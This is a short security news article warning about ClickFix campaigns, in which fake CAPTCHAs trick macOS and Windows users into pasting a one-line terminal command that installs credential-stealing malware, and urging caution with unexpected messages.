Security researchers warn of ClickFix, a relatively new attack technique that can slip past many endpoint protections on both macOS and Windows machines. The approach relies on social engineering and rapid, automated downloads delivered from a compromised site to install credential-stealing software with little to no warning.
Campaigns often begin with emails that appear to come from a hotel with a pending reservation, or messages on popular apps like WhatsApp, or even top results in Google search. The lure is tailored to look trustworthy and to prompt the user to click a link and visit a malicious page.
On arrival, users are presented with a CAPTCHA or other pretext that asks them to copy a short string, open a terminal or shell, paste it in, and press Enter. That single line triggers the malware to reach a attacker-controlled server and pull down additional payloads.
The malware then installs itself covertly, causing infection without visible signs. The common result is credential-stealing software, though campaigns have delivered other payloads such as cryptocurrency wallets or software to turn a host into part of a botnet, and to modify macOS or Windows settings to persist across reboots.
Security researchers at CrowdStrike described a particularly polished ClickFix campaign that used a Mach-O binary (the standard macOS executable) to carry the main payload, underscoring how Gatekeeper bypasses can be exploited when the user performs that one-line command. They stressed that the technique remains popular because it promotes site traffic and directly installs malware with minimal user interaction.
Experts say malvertising combined with the one-line installation command is a persistent threat, and other campaigns have targeted Windows users with similar tactics. Defender products can help, but criminals often find ways around them, making awareness and cautious browsing essential defense.
As the holiday season approaches and families spend more time online, researchers urge people to scrutinize unexpected messages, even from trusted sources, and to avoid copying text into terminals or commands unless they are certain of the source.
